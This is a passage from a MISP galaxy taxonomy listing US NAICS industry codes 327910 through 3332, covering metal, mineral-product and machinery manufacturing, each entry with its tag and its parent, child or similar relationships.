Abrasive Product Manufacturing

The tag is: misp-galaxy:naics="327910"

327910 has relationships with:

  • child-of: misp-galaxy:naics="3279" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="32791" with estimative-language:likelihood-probability="likely"

32799

All Other Nonmetallic Mineral Product Manufacturing

The tag is: misp-galaxy:naics="32799"

32799 has relationships with:

  • child-of: misp-galaxy:naics="3279" with estimative-language:likelihood-probability="likely"

327991

Cut Stone and Stone Product Manufacturing

The tag is: misp-galaxy:naics="327991"

327991 has relationships with:

  • child-of: misp-galaxy:naics="3279" with estimative-language:likelihood-probability="likely"

327992

Ground or Treated Mineral and Earth Manufacturing

The tag is: misp-galaxy:naics="327992"

327992 has relationships with:

  • child-of: misp-galaxy:naics="3279" with estimative-language:likelihood-probability="likely"

327993

Mineral Wool Manufacturing

The tag is: misp-galaxy:naics="327993"

327993 has relationships with:

  • child-of: misp-galaxy:naics="3279" with estimative-language:likelihood-probability="likely"

327999

All Other Miscellaneous Nonmetallic Mineral Product Manufacturing

The tag is: misp-galaxy:naics="327999"

327999 has relationships with:

  • child-of: misp-galaxy:naics="3279" with estimative-language:likelihood-probability="likely"

331

Primary Metal Manufacturing

The tag is: misp-galaxy:naics="331"

331 has relationships with:

  • parent-of: misp-galaxy:naics="3311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3312" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3313" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3314" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3315" with estimative-language:likelihood-probability="likely"

3311

Iron and Steel Mills and Ferroalloy Manufacturing

The tag is: misp-galaxy:naics="3311"

3311 has relationships with:

  • child-of: misp-galaxy:naics="331" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="331110" with estimative-language:likelihood-probability="likely"

33111

Iron and Steel Mills and Ferroalloy Manufacturing

The tag is: misp-galaxy:naics="33111"

33111 has relationships with:

  • child-of: misp-galaxy:naics="3311" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="331110" with estimative-language:likelihood-probability="likely"

331110

Iron and Steel Mills and Ferroalloy Manufacturing

The tag is: misp-galaxy:naics="331110"

331110 has relationships with:

  • child-of: misp-galaxy:naics="3311" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33111" with estimative-language:likelihood-probability="likely"

3312

Steel Product Manufacturing from Purchased Steel

The tag is: misp-galaxy:naics="3312"

3312 has relationships with:

  • child-of: misp-galaxy:naics="331" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="331210" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33122" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="331221" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="331222" with estimative-language:likelihood-probability="likely"

33121

Iron and Steel Pipe and Tube Manufacturing from Purchased Steel

The tag is: misp-galaxy:naics="33121"

33121 has relationships with:

  • child-of: misp-galaxy:naics="3312" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="331210" with estimative-language:likelihood-probability="likely"

331210

Iron and Steel Pipe and Tube Manufacturing from Purchased Steel

The tag is: misp-galaxy:naics="331210"

331210 has relationships with:

  • child-of: misp-galaxy:naics="3312" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33121" with estimative-language:likelihood-probability="likely"

33122

Rolling and Drawing of Purchased Steel

The tag is: misp-galaxy:naics="33122"

33122 has relationships with:

  • child-of: misp-galaxy:naics="3312" with estimative-language:likelihood-probability="likely"

331221

Rolled Steel Shape Manufacturing

The tag is: misp-galaxy:naics="331221"

331221 has relationships with:

  • child-of: misp-galaxy:naics="3312" with estimative-language:likelihood-probability="likely"

331222

Steel Wire Drawing

The tag is: misp-galaxy:naics="331222"

331222 has relationships with:

  • child-of: misp-galaxy:naics="3312" with estimative-language:likelihood-probability="likely"

3313

Alumina and Aluminum Production and Processing

The tag is: misp-galaxy:naics="3313"

3313 has relationships with:

  • child-of: misp-galaxy:naics="331" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="331313" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="331314" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="331315" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="331318" with estimative-language:likelihood-probability="likely"

33131

Alumina and Aluminum Production and Processing

The tag is: misp-galaxy:naics="33131"

33131 has relationships with:

  • child-of: misp-galaxy:naics="3313" with estimative-language:likelihood-probability="likely"

331313

Alumina Refining and Primary Aluminum Production

The tag is: misp-galaxy:naics="331313"

331313 has relationships with:

  • child-of: misp-galaxy:naics="3313" with estimative-language:likelihood-probability="likely"

331314

Secondary Smelting and Alloying of Aluminum

The tag is: misp-galaxy:naics="331314"

331314 has relationships with:

  • child-of: misp-galaxy:naics="3313" with estimative-language:likelihood-probability="likely"

331315

Aluminum Sheet, Plate, and Foil Manufacturing

The tag is: misp-galaxy:naics="331315"

331315 has relationships with:

  • child-of: misp-galaxy:naics="3313" with estimative-language:likelihood-probability="likely"

331318

Other Aluminum Rolling, Drawing, and Extruding

The tag is: misp-galaxy:naics="331318"

331318 has relationships with:

  • child-of: misp-galaxy:naics="3313" with estimative-language:likelihood-probability="likely"

3314

Nonferrous Metal (except Aluminum) Production and Processing

The tag is: misp-galaxy:naics="3314"

3314 has relationships with:

  • child-of: misp-galaxy:naics="331" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33141" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="331410" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33142" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="331420" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33149" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="331491" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="331492" with estimative-language:likelihood-probability="likely"

33141

Nonferrous Metal (except Aluminum) Smelting and Refining

The tag is: misp-galaxy:naics="33141"

33141 has relationships with:

  • child-of: misp-galaxy:naics="3314" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="331410" with estimative-language:likelihood-probability="likely"

331410

Nonferrous Metal (except Aluminum) Smelting and Refining

The tag is: misp-galaxy:naics="331410"

331410 has relationships with:

  • child-of: misp-galaxy:naics="3314" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33141" with estimative-language:likelihood-probability="likely"

33142

Copper Rolling, Drawing, Extruding, and Alloying

The tag is: misp-galaxy:naics="33142"

33142 has relationships with:

  • child-of: misp-galaxy:naics="3314" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="331420" with estimative-language:likelihood-probability="likely"

331420

Copper Rolling, Drawing, Extruding, and Alloying

The tag is: misp-galaxy:naics="331420"

331420 has relationships with:

  • child-of: misp-galaxy:naics="3314" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33142" with estimative-language:likelihood-probability="likely"

33149

Nonferrous Metal (except Copper and Aluminum) Rolling, Drawing, Extruding, and Alloying

The tag is: misp-galaxy:naics="33149"

33149 has relationships with:

  • child-of: misp-galaxy:naics="3314" with estimative-language:likelihood-probability="likely"

331491

Nonferrous Metal (except Copper and Aluminum) Rolling, Drawing, and Extruding

The tag is: misp-galaxy:naics="331491"

331491 has relationships with:

  • child-of: misp-galaxy:naics="3314" with estimative-language:likelihood-probability="likely"

331492

Secondary Smelting, Refining, and Alloying of Nonferrous Metal (except Copper and Aluminum)

The tag is: misp-galaxy:naics="331492"

331492 has relationships with:

  • child-of: misp-galaxy:naics="3314" with estimative-language:likelihood-probability="likely"

3315

Foundries

The tag is: misp-galaxy:naics="3315"

3315 has relationships with:

  • child-of: misp-galaxy:naics="331" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33151" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="331511" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="331512" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="331513" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33152" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="331523" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="331524" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="331529" with estimative-language:likelihood-probability="likely"

33151

Ferrous Metal Foundries

The tag is: misp-galaxy:naics="33151"

33151 has relationships with:

  • child-of: misp-galaxy:naics="3315" with estimative-language:likelihood-probability="likely"

331511

Iron Foundries

The tag is: misp-galaxy:naics="331511"

331511 has relationships with:

  • child-of: misp-galaxy:naics="3315" with estimative-language:likelihood-probability="likely"

331512

Steel Investment Foundries

The tag is: misp-galaxy:naics="331512"

331512 has relationships with:

  • child-of: misp-galaxy:naics="3315" with estimative-language:likelihood-probability="likely"

331513

Steel Foundries (except Investment)

The tag is: misp-galaxy:naics="331513"

331513 has relationships with:

  • child-of: misp-galaxy:naics="3315" with estimative-language:likelihood-probability="likely"

33152

Nonferrous Metal Foundries

The tag is: misp-galaxy:naics="33152"

33152 has relationships with:

  • child-of: misp-galaxy:naics="3315" with estimative-language:likelihood-probability="likely"

331523

Nonferrous Metal Die-Casting Foundries

The tag is: misp-galaxy:naics="331523"

331523 has relationships with:

  • child-of: misp-galaxy:naics="3315" with estimative-language:likelihood-probability="likely"

331524

Aluminum Foundries (except Die-Casting)

The tag is: misp-galaxy:naics="331524"

331524 has relationships with:

  • child-of: misp-galaxy:naics="3315" with estimative-language:likelihood-probability="likely"

331529

Other Nonferrous Metal Foundries (except Die-Casting)

The tag is: misp-galaxy:naics="331529"

331529 has relationships with:

  • child-of: misp-galaxy:naics="3315" with estimative-language:likelihood-probability="likely"

332

Fabricated Metal Product Manufacturing

The tag is: misp-galaxy:naics="332"

332 has relationships with:

  • parent-of: misp-galaxy:naics="3321" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3322" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3323" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3324" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3325" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3326" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3327" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3328" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3329" with estimative-language:likelihood-probability="likely"

3321

Forging and Stamping

The tag is: misp-galaxy:naics="3321"

3321 has relationships with:

  • child-of: misp-galaxy:naics="332" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332114" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332117" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332119" with estimative-language:likelihood-probability="likely"

33211

Forging and Stamping

The tag is: misp-galaxy:naics="33211"

33211 has relationships with:

  • child-of: misp-galaxy:naics="3321" with estimative-language:likelihood-probability="likely"

332111

Iron and Steel Forging

The tag is: misp-galaxy:naics="332111"

332111 has relationships with:

  • child-of: misp-galaxy:naics="3321" with estimative-language:likelihood-probability="likely"

332112

Nonferrous Forging

The tag is: misp-galaxy:naics="332112"

332112 has relationships with:

  • child-of: misp-galaxy:naics="3321" with estimative-language:likelihood-probability="likely"

332114

Custom Roll Forming

The tag is: misp-galaxy:naics="332114"

332114 has relationships with:

  • child-of: misp-galaxy:naics="3321" with estimative-language:likelihood-probability="likely"

332117

Powder Metallurgy Part Manufacturing

The tag is: misp-galaxy:naics="332117"

332117 has relationships with:

  • child-of: misp-galaxy:naics="3321" with estimative-language:likelihood-probability="likely"

332119

Metal Crown, Closure, and Other Metal Stamping (except Automotive)

The tag is: misp-galaxy:naics="332119"

332119 has relationships with:

  • child-of: misp-galaxy:naics="3321" with estimative-language:likelihood-probability="likely"

3322

Cutlery and Handtool Manufacturing

The tag is: misp-galaxy:naics="3322"

3322 has relationships with:

  • child-of: misp-galaxy:naics="332" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33221" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332215" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332216" with estimative-language:likelihood-probability="likely"

33221

Cutlery and Handtool Manufacturing

The tag is: misp-galaxy:naics="33221"

33221 has relationships with:

  • child-of: misp-galaxy:naics="3322" with estimative-language:likelihood-probability="likely"

332215

Metal Kitchen Cookware, Utensil, Cutlery, and Flatware (except Precious) Manufacturing

The tag is: misp-galaxy:naics="332215"

332215 has relationships with:

  • child-of: misp-galaxy:naics="3322" with estimative-language:likelihood-probability="likely"

332216

Saw Blade and Handtool Manufacturing

The tag is: misp-galaxy:naics="332216"

332216 has relationships with:

  • child-of: misp-galaxy:naics="3322" with estimative-language:likelihood-probability="likely"

3323

Architectural and Structural Metals Manufacturing

The tag is: misp-galaxy:naics="3323"

3323 has relationships with:

  • child-of: misp-galaxy:naics="332" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33231" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332312" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332313" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33232" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332321" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332322" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332323" with estimative-language:likelihood-probability="likely"

33231

Plate Work and Fabricated Structural Product Manufacturing

The tag is: misp-galaxy:naics="33231"

33231 has relationships with:

  • child-of: misp-galaxy:naics="3323" with estimative-language:likelihood-probability="likely"

332311

Prefabricated Metal Building and Component Manufacturing

The tag is: misp-galaxy:naics="332311"

332311 has relationships with:

  • child-of: misp-galaxy:naics="3323" with estimative-language:likelihood-probability="likely"

332312

Fabricated Structural Metal Manufacturing

The tag is: misp-galaxy:naics="332312"

332312 has relationships with:

  • child-of: misp-galaxy:naics="3323" with estimative-language:likelihood-probability="likely"

332313

Plate Work Manufacturing

The tag is: misp-galaxy:naics="332313"

332313 has relationships with:

  • child-of: misp-galaxy:naics="3323" with estimative-language:likelihood-probability="likely"

33232

Ornamental and Architectural Metal Products Manufacturing

The tag is: misp-galaxy:naics="33232"

33232 has relationships with:

  • child-of: misp-galaxy:naics="3323" with estimative-language:likelihood-probability="likely"

332321

Metal Window and Door Manufacturing

The tag is: misp-galaxy:naics="332321"

332321 has relationships with:

  • child-of: misp-galaxy:naics="3323" with estimative-language:likelihood-probability="likely"

332322

Sheet Metal Work Manufacturing

The tag is: misp-galaxy:naics="332322"

332322 has relationships with:

  • child-of: misp-galaxy:naics="3323" with estimative-language:likelihood-probability="likely"

332323

Ornamental and Architectural Metal Work Manufacturing

The tag is: misp-galaxy:naics="332323"

332323 has relationships with:

  • child-of: misp-galaxy:naics="3323" with estimative-language:likelihood-probability="likely"

3324

Boiler, Tank, and Shipping Container Manufacturing

The tag is: misp-galaxy:naics="3324"

3324 has relationships with:

  • child-of: misp-galaxy:naics="332" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33241" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332410" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33242" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332420" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33243" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332431" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332439" with estimative-language:likelihood-probability="likely"

33241

Power Boiler and Heat Exchanger Manufacturing

The tag is: misp-galaxy:naics="33241"

33241 has relationships with:

  • child-of: misp-galaxy:naics="3324" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="332410" with estimative-language:likelihood-probability="likely"

332410

Power Boiler and Heat Exchanger Manufacturing

The tag is: misp-galaxy:naics="332410"

332410 has relationships with:

  • child-of: misp-galaxy:naics="3324" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33241" with estimative-language:likelihood-probability="likely"

33242

Metal Tank (Heavy Gauge) Manufacturing

The tag is: misp-galaxy:naics="33242"

33242 has relationships with:

  • child-of: misp-galaxy:naics="3324" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="332420" with estimative-language:likelihood-probability="likely"

332420

Metal Tank (Heavy Gauge) Manufacturing

The tag is: misp-galaxy:naics="332420"

332420 has relationships with:

  • child-of: misp-galaxy:naics="3324" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33242" with estimative-language:likelihood-probability="likely"

33243

Metal Can, Box, and Other Metal Container (Light Gauge) Manufacturing

The tag is: misp-galaxy:naics="33243"

33243 has relationships with:

  • child-of: misp-galaxy:naics="3324" with estimative-language:likelihood-probability="likely"

332431

Metal Can Manufacturing

The tag is: misp-galaxy:naics="332431"

332431 has relationships with:

  • child-of: misp-galaxy:naics="3324" with estimative-language:likelihood-probability="likely"

332439

Other Metal Container Manufacturing

The tag is: misp-galaxy:naics="332439"

332439 has relationships with:

  • child-of: misp-galaxy:naics="3324" with estimative-language:likelihood-probability="likely"

3325

Hardware Manufacturing

The tag is: misp-galaxy:naics="3325"

3325 has relationships with:

  • child-of: misp-galaxy:naics="332" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33251" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332510" with estimative-language:likelihood-probability="likely"

33251

Hardware Manufacturing

The tag is: misp-galaxy:naics="33251"

33251 has relationships with:

  • child-of: misp-galaxy:naics="3325" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="332510" with estimative-language:likelihood-probability="likely"

332510

Hardware Manufacturing

The tag is: misp-galaxy:naics="332510"

332510 has relationships with:

  • child-of: misp-galaxy:naics="3325" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33251" with estimative-language:likelihood-probability="likely"

3326

Spring and Wire Product Manufacturing

The tag is: misp-galaxy:naics="3326"

3326 has relationships with:

  • child-of: misp-galaxy:naics="332" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33261" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332613" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332618" with estimative-language:likelihood-probability="likely"

33261

Spring and Wire Product Manufacturing

The tag is: misp-galaxy:naics="33261"

33261 has relationships with:

  • child-of: misp-galaxy:naics="3326" with estimative-language:likelihood-probability="likely"

332613

Spring Manufacturing

The tag is: misp-galaxy:naics="332613"

332613 has relationships with:

  • child-of: misp-galaxy:naics="3326" with estimative-language:likelihood-probability="likely"

332618

Other Fabricated Wire Product Manufacturing

The tag is: misp-galaxy:naics="332618"

332618 has relationships with:

  • child-of: misp-galaxy:naics="3326" with estimative-language:likelihood-probability="likely"

3327

Machine Shops; Turned Product; and Screw, Nut, and Bolt Manufacturing

The tag is: misp-galaxy:naics="3327"

3327 has relationships with:

  • child-of: misp-galaxy:naics="332" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33271" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332710" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33272" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332721" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332722" with estimative-language:likelihood-probability="likely"

33271

Machine Shops

The tag is: misp-galaxy:naics="33271"

33271 has relationships with:

  • child-of: misp-galaxy:naics="3327" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="332710" with estimative-language:likelihood-probability="likely"

332710

Machine Shops

The tag is: misp-galaxy:naics="332710"

332710 has relationships with:

  • child-of: misp-galaxy:naics="3327" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33271" with estimative-language:likelihood-probability="likely"

33272

Turned Product and Screw, Nut, and Bolt Manufacturing

The tag is: misp-galaxy:naics="33272"

33272 has relationships with:

  • child-of: misp-galaxy:naics="3327" with estimative-language:likelihood-probability="likely"

332721

Precision Turned Product Manufacturing

The tag is: misp-galaxy:naics="332721"

332721 has relationships with:

  • child-of: misp-galaxy:naics="3327" with estimative-language:likelihood-probability="likely"

332722

Bolt, Nut, Screw, Rivet, and Washer Manufacturing

The tag is: misp-galaxy:naics="332722"

332722 has relationships with:

  • child-of: misp-galaxy:naics="3327" with estimative-language:likelihood-probability="likely"

3328

Coating, Engraving, Heat Treating, and Allied Activities

The tag is: misp-galaxy:naics="3328"

3328 has relationships with:

  • child-of: misp-galaxy:naics="332" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33281" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332811" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332812" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332813" with estimative-language:likelihood-probability="likely"

33281

Coating, Engraving, Heat Treating, and Allied Activities

The tag is: misp-galaxy:naics="33281"

33281 has relationships with:

  • child-of: misp-galaxy:naics="3328" with estimative-language:likelihood-probability="likely"

332811

Metal Heat Treating

The tag is: misp-galaxy:naics="332811"

332811 has relationships with:

  • child-of: misp-galaxy:naics="3328" with estimative-language:likelihood-probability="likely"

332812

Metal Coating, Engraving (except Jewelry and Silverware), and Allied Services to Manufacturers

The tag is: misp-galaxy:naics="332812"

332812 has relationships with:

  • child-of: misp-galaxy:naics="3328" with estimative-language:likelihood-probability="likely"

332813

Electroplating, Plating, Polishing, Anodizing, and Coloring

The tag is: misp-galaxy:naics="332813"

332813 has relationships with:

  • child-of: misp-galaxy:naics="3328" with estimative-language:likelihood-probability="likely"

3329

Other Fabricated Metal Product Manufacturing

The tag is: misp-galaxy:naics="3329"

3329 has relationships with:

  • child-of: misp-galaxy:naics="332" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33291" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332911" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332912" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332913" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332919" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33299" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332991" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332992" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332993" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332994" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332996" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="332999" with estimative-language:likelihood-probability="likely"

33291

Metal Valve Manufacturing

The tag is: misp-galaxy:naics="33291"

33291 has relationships with:

  • child-of: misp-galaxy:naics="3329" with estimative-language:likelihood-probability="likely"

332911

Industrial Valve Manufacturing

The tag is: misp-galaxy:naics="332911"

332911 has relationships with:

  • child-of: misp-galaxy:naics="3329" with estimative-language:likelihood-probability="likely"

332912

Fluid Power Valve and Hose Fitting Manufacturing

The tag is: misp-galaxy:naics="332912"

332912 has relationships with:

  • child-of: misp-galaxy:naics="3329" with estimative-language:likelihood-probability="likely"

332913

Plumbing Fixture Fitting and Trim Manufacturing

The tag is: misp-galaxy:naics="332913"

332913 has relationships with:

  • child-of: misp-galaxy:naics="3329" with estimative-language:likelihood-probability="likely"

332919

Other Metal Valve and Pipe Fitting Manufacturing

The tag is: misp-galaxy:naics="332919"

332919 has relationships with:

  • child-of: misp-galaxy:naics="3329" with estimative-language:likelihood-probability="likely"

33299

All Other Fabricated Metal Product Manufacturing

The tag is: misp-galaxy:naics="33299"

33299 has relationships with:

  • child-of: misp-galaxy:naics="3329" with estimative-language:likelihood-probability="likely"

332991

Ball and Roller Bearing Manufacturing

The tag is: misp-galaxy:naics="332991"

332991 has relationships with:

  • child-of: misp-galaxy:naics="3329" with estimative-language:likelihood-probability="likely"

332992

Small Arms Ammunition Manufacturing

The tag is: misp-galaxy:naics="332992"

332992 has relationships with:

  • child-of: misp-galaxy:naics="3329" with estimative-language:likelihood-probability="likely"

332993

Ammunition (except Small Arms) Manufacturing

The tag is: misp-galaxy:naics="332993"

332993 has relationships with:

  • child-of: misp-galaxy:naics="3329" with estimative-language:likelihood-probability="likely"

332994

Small Arms, Ordnance, and Ordnance Accessories Manufacturing

The tag is: misp-galaxy:naics="332994"

332994 has relationships with:

  • child-of: misp-galaxy:naics="3329" with estimative-language:likelihood-probability="likely"

332996

Fabricated Pipe and Pipe Fitting Manufacturing

The tag is: misp-galaxy:naics="332996"

332996 has relationships with:

  • child-of: misp-galaxy:naics="3329" with estimative-language:likelihood-probability="likely"

332999

All Other Miscellaneous Fabricated Metal Product Manufacturing

The tag is: misp-galaxy:naics="332999"

332999 has relationships with:

  • child-of: misp-galaxy:naics="3329" with estimative-language:likelihood-probability="likely"

333

Machinery Manufacturing

The tag is: misp-galaxy:naics="333"

333 has relationships with:

  • parent-of: misp-galaxy:naics="3331" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3332" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3333" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3334" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3335" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3336" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3339" with estimative-language:likelihood-probability="likely"

3331

Agriculture, Construction, and Mining Machinery Manufacturing

The tag is: misp-galaxy:naics="3331"

3331 has relationships with:

  • child-of: misp-galaxy:naics="333" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33312" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33313" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="333132" with estimative-language:likelihood-probability="likely"

33311

Agricultural Implement Manufacturing

The tag is: misp-galaxy:naics="33311"

33311 has relationships with:

  • child-of: misp-galaxy:naics="3331" with estimative-language:likelihood-probability="likely"

333111

Farm Machinery and Equipment Manufacturing

The tag is: misp-galaxy:naics="333111"

333111 has relationships with:

  • child-of: misp-galaxy:naics="3331" with estimative-language:likelihood-probability="likely"

333112

Lawn and Garden Tractor and Home Lawn and Garden Equipment Manufacturing

The tag is: misp-galaxy:naics="333112"

333112 has relationships with:

  • child-of: misp-galaxy:naics="3331" with estimative-language:likelihood-probability="likely"

33312

Construction Machinery Manufacturing

The tag is: misp-galaxy:naics="33312"

33312 has relationships with:

  • child-of: misp-galaxy:naics="3331" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="333120" with estimative-language:likelihood-probability="likely"

333120

Construction Machinery Manufacturing

The tag is: misp-galaxy:naics="333120"

333120 has relationships with:

  • child-of: misp-galaxy:naics="3331" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33312" with estimative-language:likelihood-probability="likely"

33313

Mining and Oil and Gas Field Machinery Manufacturing

The tag is: misp-galaxy:naics="33313"

33313 has relationships with:

  • child-of: misp-galaxy:naics="3331" with estimative-language:likelihood-probability="likely"

333131

Mining Machinery and Equipment Manufacturing

The tag is: misp-galaxy:naics="333131"

333131 has relationships with:

  • child-of: misp-galaxy:naics="3331" with estimative-language:likelihood-probability="likely"

333132

Oil and Gas Field Machinery and Equipment Manufacturing

The tag is: misp-galaxy:naics="333132"

333132 has relationships with:

  • child-of: misp-galaxy:naics="3331" with estimative-language:likelihood-probability="likely"

3332

Industrial Machinery Manufacturing

The tag is: misp-galaxy:naics="3332"

3332 has relationships with:

  • child-of: misp-galaxy:naics="333" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33324" with estimative-language:likelihood-probability="likely"

